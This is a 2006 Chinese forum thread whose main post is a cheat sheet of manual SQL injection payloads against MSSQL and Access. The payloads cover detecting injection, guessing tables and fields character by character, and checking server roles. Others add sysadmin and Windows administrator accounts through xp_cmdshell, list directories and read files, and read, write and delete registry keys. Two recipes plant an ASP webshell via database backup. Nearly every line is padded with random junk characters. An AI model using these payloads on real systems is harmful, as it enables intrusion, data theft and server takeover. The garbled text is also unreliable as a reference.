社区应用 最新帖子 精华区 社区服务 会员列表 统计排行 社区论坛任务 迷你宠物
  • 4279阅读
  • 2回复

手动方式SQL注入脚本命令

级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
1.判断是否有注入;and 1=1 ;and 1=2 \tP*Pz  
  2.初步判断是否是mssql ;and user>0 iP1yy5T  
H29vuGQjq  
  3.注入参数是字符'and [查询条件] and ''=' k7(lwEgNG  
w{4#Q[  
  4.搜索时没过滤参数的'and [查询条件] and '%25'=' M<Y{Cs  
!FvL2L  
  5.判断数据库系统  RcZ&/MY  
vYq"W%  
  ;and (select count(*) from sysobjects)>0 mssql kovJ9  
pIKfTkSqH  
  ;and (select count(*) from msysobjects)>0 access E `V?Io  
>4Qj+ou  
>LB*5  
N(O* "1b  
  6.猜数据库 ;and (select Count(*) from [数据库名])>0 r?pN-x$M=  
Dv4 H^  
  7.猜字段 ;and (select Count(字段名) from 数据库名)>0 gf^y3F[\  
c(!pcB8  
  8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 6QNZ/Ox:  
q 2;CvoF  
  9.(1)猜字段的ascii值(access) .k%/JF91n  
6LqF*$+$`  
  ;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 Hr \vu`p$  
kPO+M~+n  
  (2)猜字段的ascii值(mssql) w8#ji 1gX  
i8#:y`ai  
  ;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 162Dj$  
&G?w*w_n  
  10.测试权限结构(mssql) ?.c:k;j  
]@CXUa,>a  
0%yPuY>  
w BoP&l  
  ;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- f?(g5o*2  
o?I`n*u"X  
  ;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- j{/5i`5m  
V}FH5z |  
  ;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- r&~]6 U  
Q@*9|6-  
  ;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- ?!3u ?Kd  
/PG%Y]l0b  
  ;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- z9v70 q  
vOl3utu7  
  ;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- +=*ND<$n/E  
//bQD>NBO  
  ;and 1=(select IS_MEMBER('db_owner'));-- ET%F+  
|lyspD  
hW\'EJ  
iEbW[sX[ 4  
  11.添加mssql和系统的帐户 /2 qxJvZ  
}|j#C[  
  ;exec master.dbo.sp_addlogin username;-- G{zxP%[E  
  ;exec master.dbo.sp_password null,username,password;-- _*xY>?Aq  
|`+ (O  
  ;exec master.dbo.sp_addsrvrolemember sysadmin username;-- : z\||f  
kZfj"+p_S  
  ;exec master.dbo.xp_cmdshell 'net user username password wBEBj7(y  
c4bvJy8  
  /workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- 7Oi<_b  
gyU=v{].  
  ;exec master.dbo.xp_cmdshell 'net user username password /add';-- +KOhDtLMG  
}}Gkipp  
  ;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- \vuWypo  
!P6?nS  
;Q[E>j?w=  
( v$ i  
  12.(1)遍历目录 OJ.oHf=K!  
"5<YN#  
  ;create table dirs(paths varchar(100), id int) :zpT Gk8Z  
GY"c1 KE$  
  ;insert dirs exec master.dbo.xp_dirtree 'c:\' :J+ANIRI  
jV<5GWq  
  ;and (select top 1 paths from dirs)>0 N5tFEV'G  
]jR-<l8I-  
  ;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) Yfy";C7X  
C\0,D9  
>}d6)s|   
9QeBz`lm)  
  (2)遍历目录 <1`MjP*w  
Of eM;)  
  ;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- :\%hv>}|  
  ;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 rY$ wC%  
ppeF,Q  
  ;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 OK z5;#S=  
oq (W|  
  ;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 nd5.Py$  
?gjkgCbC#  
  ;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 ler$HA%F]  
W~s:SN  
_6]tbni?v  
bvT$/ (7  
  13.mssql中的存储过程 LwH+X:?i  
t{Ks}9B  
  xp_regenumvalues 注册表根键, 子键 \#gguq?[  
\t? ;p-+ta  
  ;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 !HXyvyDN  
I}awembw g  
  xp_regread 根键,子键,键值名 u5`b")a  
%iZ~RTY6 !  
  ;exec xp_regread q^L"@Q5;  
o ,8;=f,7  
  'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 +KIBbXF7  
_9S"rH[  
  xp_regwrite 根键,子键, 值名, 值类型, 值 q~{O^,4S  
*]DO3Zw'  
  值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 zJOyr"B'8  
\8k4v#wH  
  ;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 !VHw*fL|r  
J~N!. i  
  xp_regdeletevalue 根键,子键,值名 MI`<U:-lP  
1b@]^Ue  
  exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 [5GzY`/m  
dX-j3lM:#  
  xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 FQ/z,it_i  
i{r[zA]$  
)W1[{?  
wid  
  14.mssql的backup创建webshell q%XjJ -s:  
@J6V ,  
  use model C *7x7|z  
9q2x}  
  create table cmd(str image); cxIAI=JK  
z\K-KD{Ad  
  insert into cmd(str) values (''); K)eyFc  
.AF\[IQ  
  backup database model to disk='c:\l.asp'; U:|:Y=O?Q  
( ;KTV*1  
On,z# A  
CH6;jo]  
  15.mssql内置函数 04a@  
0Q]{r )  
  ;and (select @@version)>0 获得Windows的版本号 ,X\qlT5C  
T|5uywA|  
  ;and user_name()='dbo' 判断当前系统的连接用户是不是sa .RbPO#(  
O81'i2M J9  
  ;and (select user_name())>0 爆当前系统的连接用户 uzS;&-nA  
_iu^VK,}  
  ;and (select db_name())>0 得到当前连接的数据库 k?Njge6@  
C`8.8  
jTqE V(  
k:&B b"  
  16.简洁的webshell ]'z 5%'  
"}0)~,{x B  
  use model Ls&-8  
- R`nitf  
  create table cmd(str image); Y{8}z ZD  
$$'[ %  
  insert into cmd(str) values (''); c7R6.T  
!]&+g'aC3  
  backup database model to disk='g:\wwwtest\l.asp';
评价一下你浏览此帖子的感受

精彩

感动

搞笑

开心

愤怒

无聊

灌水
级别: 经院博士
发帖
3975
铜板
4727
人品值
1147
贡献值
565
交易币
0
好评度
3833
信誉值
0
金币
0
所在楼道
学一楼
只看该作者 1 发表于: 2006-08-31
学习.......... 呵呵 我是好人
引用

引用
想找我?如果我即不在 石家庄经济学院论坛www.uebbs.net,也不在宿舍,那,我肯定是在去的路上

引用
级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
只看该作者 2 发表于: 2006-08-31
这个和好人有关系吗?
描述
快速回复

您目前还是游客,请 登录注册
批量上传需要先选择文件,再选择上传
认证码:
验证问题:
10+5=?,请输入中文答案:十五